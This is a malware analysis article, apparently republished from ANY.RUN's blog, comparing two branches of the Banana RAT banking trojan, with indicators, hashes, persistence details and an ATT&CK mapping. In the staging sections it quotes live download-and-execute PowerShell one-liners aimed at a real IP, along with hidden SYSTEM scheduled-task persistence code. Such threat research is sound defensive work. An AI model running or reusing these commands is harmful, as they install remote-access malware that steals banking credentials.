BackBox.org News
  • BackBox.org
  • Linux
  • Community
  • News
  • Services
  • Sitemap
  • Contact
  • Click to open the search input field Click to open the search input field Search
  • Menu Menu
Banana RAT Evolves: Comparing Two Recent Branches Through ANY.RUN 

Banana RAT Evolves: Comparing Two Recent Branches Through ANY.RUN 

July 7, 2026/in Company Blogs

Editor’s note: The analysis is authored by Moises Cerqueira, malware researcher & threat hunter. You can find Moises on LinkedIn and X.

This analysis started with an exposed public index on 198[.]245[.]53[.]26, discovered via Shodan. What made it interesting was not just the server exposure itself, but the fact that it lets us compare two different Banana RAT branches tied to the same infrastructure.

The older detonation, analyzed on May 25, 2026, used an ETW-themed installation path and fake Microsoft naming. The newer detonation, analyzed on June 09, 2026, moved to randomized installation identifiers, VBS-assisted persistence, and WebSocket C2 over a hashed testewin.com subdomain.

That difference is important. Instead of seeing a single sample in isolation, we can see how the malware evolved while keeping the same staging host. This gives defenders more than a one-off IOC list: it shows how the operator changed persistence, transport, and artifact naming between two live branches.

This article focuses on three questions:

  • What the older branch did on disk, in memory, and on the network.
  • What changed in the newer branch.
  • Which indicators remained stable across both branches.
Older detonation overview

Why This Sample Matters

Banana RAT is already known for targeting Brazilian financial activity, especially banking sessions and Pix-related fraud. On its own, that is not enough to justify another write-up. What makes this case worth publishing is the branch evolution visible through two detonations and one exposed server.

The public index on 198[.]245[.]53[.]26 exposed not only stage files such as st.php, st2.txt, and msedge.txt, but also operational tooling such as servidor_completo_pool.py and ofuscador.py. This was not just a payload host – it appeared to be active delivery infrastructure with variant-generation logic on the backend.

That creates a useful story for readers:

  • The same staging host serves both an older and a newer branch.
  • The operator changed artifact naming and persistence style.
  • The newer payload still keeps a fallback path that overlaps with older infrastructure choices.
Exposed public index at 198.245.53.26

Exposed Infrastructure: Payload Generator and Obfuscator

servidor_completo_pool.py

This is a FastAPI-based service that acts as a production payload distribution backend. Its most notable characteristics are: a pool-based pre-generation of payload variants, source payloads read from /var/www/html, and exposed endpoints including /proteger, /warmup, /stats, and /folders. The script includes multiple obfuscation layers with domain, path, and string transformation logic, and it explicitly protects scheduled task and registry persistence strings during transformation.

This is consistent with a live malware builder designed to generate polymorphic payload variants on demand.

ofuscador.py

This helper script converts PowerShell commands into an ASCII-character reconstruction wrapper inside a BAT launcher. It converts each character to ord(), rebuilds the command using [char[]], and executes the result with iex. The output is the kind of bat-wrapped PowerShell one-liner used as an initial lure.

Obfuscator output / character-reconstruction wrapper

Samples and Hashes

Artifact  Role  SHA256 
Fatura-BtgPactual-22568.bat  Older detonation entry sample  BC4C29BC0C84EA18311FBADC508F6F3A9D84B54A456E672C2AB34D6B42F56C0C 
msedgeupdate.txt / msedge.txt  Older branch full payload  443C0A821C214471D74B51093AB3D69BB9BEE54DED049E5ABCDA2551E4F12707 
st.php.malw  Stage-2 stager (newer branch)  E9D918FF5F7918CFF1A3A23F3945058A66B56D6DD724066414C7E1CAB95E166D 
payload_new.php.malw  Full PowerShell payload (newer branch)  D828949ADE683CF3AC6D4260F946CA33EF861035051DB07D3EE79EC75DD243B2 
c9dba5b0552d879be654.txt  Runtime payload extracted from host  D828949ADE683CF3AC6D4260F946CA33EF861035051DB07D3EE79EC75DD243B2 

The matching SHA256 between payload_new.php.malw and the extracted runtime payload closes the loop between public infrastructure, sandbox telemetry, and recovered runtime artifact.

The Older Detonation: ETW-Themed Branch

Staging and First Execution

The older detonation analyzed Fatura-BtgPactual-22568.bat (SHA256 BC4C29BC…C0C), tagged by ANY.RUN as a PowerShell-based loader. The staging chain was straightforward:

  • GET http://198[.]245[.]53[.]26/st.txt
  • GET http://198[.]245[.]53[.]26/payload.php
  • The visible PowerShell one-liner used was:
powershell "$po='http://198.245.53.26/st.txt';iex(irm $po)" 

This anchors the older branch to the same host later used by the newer branch. The difference is in the second-stage naming and the final payload behavior, not in the initial staging server.

Older branch network requests

Disk Artifacts and Persistence

The older branch used recognizable, static installation artifacts:

  • C:UsersPublicDocumentsmsedge.txt
  • C:UsersadminAppDataRoamingMicrosoftDiagnosisETWmsedgeupdate.txt
  • C:ProgramDataMicrosoftDiagnosisETWmsedgeupdate.txt
  • C:UsersadminAppDataRoamingMicrosoftDiagnosisETWlauncher.exe
  • C:ProgramDataMicrosoftDiagnosisETWMicrosoftEdgeUpdateCore.exe

Additional artifacts included client.pid, client_debug.log, install.token, user_process.log, and process_7780.log. ANY.RUN behavior showed: hidden PowerShell execution, base64-encoded PowerShell, task-scheduler-backed execution, and attempts to relaunch through an -InstallService path.

Close detection gaps with ANY.RUN.
Reduce security risk and breach impact.



Contact us


Notable command lines:

"powershell.exe" -NoP -EP Bypass -W Hidden -c "$env:MSEDGE_SKIP_UAC='1'; 
 IEX (gc '...ETWmsedgeupdate.txt' -Raw)"
"powershell.exe" -ExecutionPolicy Bypass -Command 
 "& ([ScriptBlock]::Create((gc '...msedgeupdate.txt' -Raw))) 
 -ScriptPath '...msedgeupdate.txt' -InstallService" 
Older branch dropped files
MicrosoftEdgeUpdateCore.exe configuration

Older Branch C2

The older branch used a pseudo-Microsoft hostname: c.windowns-cdn.com resolving to 149[.]56[.]12[.]51, with the active connection going to 149[.]56[.]12[.]51:443 (owner: powershell.exe PID 5784). This was functional but easier to cluster once defenders noticed the typo in ‘windowns’.

Older branch C2 DNS and connection

The Newer Detonation: Dynamic SvcName and WebSocket Branch

Staging and Payload Delivery

The newer detonation analyzed st.php.malw (SHA256 E9D918FF…66D). The staging pattern still pointed to 198[.]245[.]53[.]26, but the stage file changed from st.txt to st.php:

  • GET http://198[.]245[.]53[.]26/st.php
  • GET http://198[.]245[.]53[.]26/payload.php

The staging PowerShell now enforced TLS 1.2:

"powershell.exe" -NoP -EP Bypass -W Hidden -c 
 "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; 
 $env:_xR='1';irm http://198.245.53.26/st.php|iex" 
Newer detonation overview
Newer branch dropped files

Persistence Model

The newer branch uses a cleaner and more flexible persistence model. Instead of fixed ETW-themed names, it builds a Microsoft-looking directory under ProgramData, writes the runtime payload there, then creates a VBS launcher at C:ProgramDataMicrosoft7c70c4282dfc72fac9dba5b0552d.vbs.

The runtime payload explicitly sets:

TaskName = SvcName

And creates a hidden Scheduled Task running as SYSTEM:

Register-ScheduledTask -TaskName $taskName
New-ScheduledTaskTrigger -AtStartup
New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest -LogonType ServiceAccount

In this detonation, the task name was 7c70c4282dfc72fa. If the malware is not elevated yet, it supports a fallback under HKCUSoftwareMicrosoftWindowsCurrentVersionRun – the sample can survive under the user context first, then migrate into a SYSTEM-level scheduled task later.

Registry writes observed:

  • HKCUSoftwareMicrosoftdc98339fa461 → SvcName = 7c70c4282dfc72fa, FileName = c9dba5b0552d879be654
  • HKCUSoftwareMicrosoftWindows → CU = HKCU:SoftwareMicrosoftdc98339fa461
  • HKCU…Internet SettingsZoneMap → ProxyBypass=1, IntranetName=1, UNCAsIntranet=1, AutoDetect=0
Decoded VBS Launcher
Newer branch process tree

WebSocket C2 and Host-Derived Domains

Instead of the older windowns-cdn pattern, the runtime payload builds a host-specific domain from the victim’s MachineGuid: MD5(MachineGuid).testewin.com. In this detonation the resolved domain was 52facc3b24f8bad9c5c56819e385f3a1.testewin.com, and the payload connected to:

wss://52facc3b24f8bad9c5c56819e385f3a1.testewin.com:443/agent

ANY.RUN showed the domain resolving to Cloudflare addresses 104[.]21.39.21 and 172[.]67[.]142[.]55. The runtime payload also contains a fallback domain (cdn.testewin.com), a fallback IP (149[.]56[.]12[.]51), protocol version 11.07-FAST-RECONNECT, and protocol magic LQWP. That fallback IP links the newer branch directly to the older one.

WebSocket C2 to /agent
DNS resolution / Cloudflare layer
c9dba5b0552d879be654.txt Runtime payload code excerpt

Threat Intelligence Classification: Chronology and Analytical Assessments

To provide a rigorous analytical framework, this campaign’s technical elements are broken down into observed telemetry, analytical inferences derived from infrastructure leakage, and historical baselines.

Feature  Older branch (May 25, 2026)  Newer branch (June 09, 2026) 
Initial staging path  /st.txt  /st.php 
Payload delivery  /payload.php  /payload.php 
Install path theme  Fixed ETW-themed paths  Dynamic ProgramDataMicrosoft 
Main payload filename  msedgeupdate.txt / msedge.txt  .txt (randomized) 
Launcher  launcher.exe + service components  VBS launcher + hidden PowerShell 
Named executable  MicrosoftEdgeUpdateCore.exe  None stable 
Identity model  Static artifact names  Randomized SvcName + FileName 
Primary C2  c.windowns-cdn.com → 149.56.12.51  *.testewin.com over WebSocket 
Network masking  Pseudo-Microsoft hostname  Hashed subdomain + Cloudflare 
Transport  HTTPS/TCP  wss://:443/agent 
Persistence chain  Partial (minimal registry export)  Clearly reconstructable 

Prior Reporting & Legacy Baseline

  • Infrastructure Origin: Historical tracking from May 2026 established the initial staging footprint on the IP 198[.]245[.]53[.]26, utilizing primitive HTTP staging paths (/st.txt).
  • Static Execution Blueprint: The older branch relied entirely on static, predictable installation targets themed after Windows Event Tracing (ETW) logs (MicrosoftDiagnosisETW) and a single pseudo-Microsoft C2 domain (c.windowns-cdn.com).

Observed Telemetry (Factual Artifacts)

  • Exposed Staging Infrastructure: Identification of an open directory on 198[.]245[.]53[.]26 exposing the production backend framework, including servidor_completo_pool.py (a FastAPI payload generation manager) and ofuscador[.]py.
  • Dynamic Endpoint Execution: Sandbox execution of the June 2026 branch (st[.]php.malw) confirmed a migration to runtime-generated paths based on the victim’s environment and a VBScript launcher wrapper.
  • Encrypted WebSocket Transport: Network telemetry confirmed C2 migration to secure WebSockets (wss://.testewin.com:443/agent) routing through Cloudflare edges (104[.]21[.]39[.]21 / 172[.]67[.]142[.]55).

Accelerate investigations and enrich security workflows
Detection, threat intelligence, hunting, proactive defense.



Start here


Analytical Inferences

  • Malware-as-a-Service (MaaS) Engine: The recovery of servidor_completo_pool.py and its asynchronous pre-generation functions (code_pool.warmup_all()) strongly infers that the threat actors are running an automated, on-demand variant distribution platform to supply multiple affiliates.
  • Defeating Bulk Network Clustering: The automated generation of unique subdomains derived from the victim’s MachineGuid is a calculated architectural choice. It ensures that defense mechanisms cannot sinkhole or block the core C2 infrastructure via generic domain-level blacklisting without risking collateral disruption of legitimate fronting services.
  • Evasion Optimization Gaps: While the operators successfully upgraded their network transport layers (WebSockets/Cloudflare), Cloudflare is primarily utilized here to obscure the backend origin infrastructure and complicate direct IP-based blocking. However, since the campaign relies on a dedicated malicious apex domain (*.testewin.com), defenders can effectively deploy blocks at the domain, SNI, or DNS level without risking collateral disruption to unrelated legitimate services hosted behind Cloudflare.

Execution Flow Comparison

Capability Assessment

Based on payload content, sandbox behavior, and prior branch context, this branch supports:

  • Hidden PowerShell staging and dynamic host-specific installation
  • Persistence via Scheduled Task (preferred) and Run key fallback
  • WebSocket C2 with resilient reconnect logic (11.07-FAST-RECONNECT)
  • Screen and session monitoring
  • Remote input capability
  • System and process discovery
  • File transfer and enumeration
  • Key input tracking and screen capture / overlay workflows
  • Runtime C# compilation via csc.exe and cvtres.exe

This is not a downloader. It is a fully-featured banking-oriented remote access payload.

MITRE ATT&CK Mapping

Tactic   Technique   ID  Evidence 
Execution   Command and Scripting Interpreter: PowerShell   T1059.001  Hidden staging execution chains, dynamic base64 assembly, and memory-only execution  
Execution   Command and Scripting Interpreter: Visual Basic   T1059.005   Use of a standalone .vbs wrapper to launch the primary payload dropped into ProgramData  
Persistence   Scheduled Task/Job: Scheduled Task   T1053.005   Automated deployment of hidden tasks executed as SYSTEM via Register-ScheduledTask  
Persistence   Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder   T1547.001   Fallback persistence structure utilizing HKCU…CurrentVersionRun if privileges are not elevated  
Defense Evasion   Obfuscated Files or Information   T1027   Multi-layered character reconstruction algorithms (ofuscador.py) and backend string splitting.  
Defense Evasion   Hide Artifacts: Hidden Files and Directories   T1564.001   Target payload files and persistence launchers utilize system attributes and restricted paths.  
Defense Evasion   Deobfuscate/Decode Files or Information   T1140   Memory-side invocation of base64-decoded wrappers and .NET reflection for sensitive API calls  
Discovery   System Information Discovery   T1082   Active extraction of MachineGuid and environment flags to generate host-specific parameters.  
Discovery   Process Discovery   T1057   Automated verification of active processes against hardcoded local defense lists.  
Collection   Input Capture: Keylogging   T1056.001   Native API-level monitoring (keybd_event) for capturing active banking credentials.  
Collection   Screen Capture   T1113   In-memory .NET reflection calling screenshot routines and web overlay injections.  
Command & Control   Application Layer Protocol: Web Protocols   T1071.001   High-frequency asynchronous communication over WebSockets (wss://…/agent).  

Conclusion

The exposed server at 198[.]245[.]53[.]26 gave a rare opportunity to compare two related Banana RAT branches through live infrastructure, sandbox telemetry, and recovered payloads. The older branch used ETW-themed paths, static Microsoft-looking names, and a typo-based pseudo-Microsoft C2 identity. The newer branch kept the same staging concept but moved to randomized install identifiers, better-structured SYSTEM persistence, and a WebSocket channel built around a hashed testewin.com subdomain.

The main takeaways are:

The staging host remained stable across both detonations.

The payload branch changed significantly between May 25, 2026 and June 09, 2026.

The newer runtime payload recovered from disk exactly matches the sandbox-dropped payload (same SHA256).

The fallback IP 149[.]56[.]12[.]51 is a reliable cross-branch anchor.

The public index exposed not only stage files but also backend tooling consistent with active, polymorphic payload generation.

The post Banana RAT Evolves: Comparing Two Recent Branches Through ANY.RUN  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Share this entry
  • Share on Facebook
  • Share on X
  • Share on WhatsApp
  • Share on LinkedIn
  • Share on Vk
  • Share on Reddit
  • Share by Mail
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png 0 0 admin https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png admin2026-07-07 15:06:302026-07-07 15:06:30Banana RAT Evolves: Comparing Two Recent Branches Through ANY.RUN 
Search Search
Copyright © BackBox.org
  • Link to X
  • Link to Facebook
  • Link to LinkedIn
  • Link to Youtube
  • Link to Telegram
Link to: Iran-Linked Hackers Using Modular C&C Framework in Cyberattacks Link to: Iran-Linked Hackers Using Modular C&C Framework in Cyberattacks Iran-Linked Hackers Using Modular C&C Framework in Cyberattacks Link to: Major Japanese telco says cyberattack exposed 12 million emails Link to: Major Japanese telco says cyberattack exposed 12 million emails Major Japanese telco says cyberattack exposed 12 million emailsMajor Japanese telco says cyberattack exposed 12 million emails
Scroll to top Scroll to top Scroll to top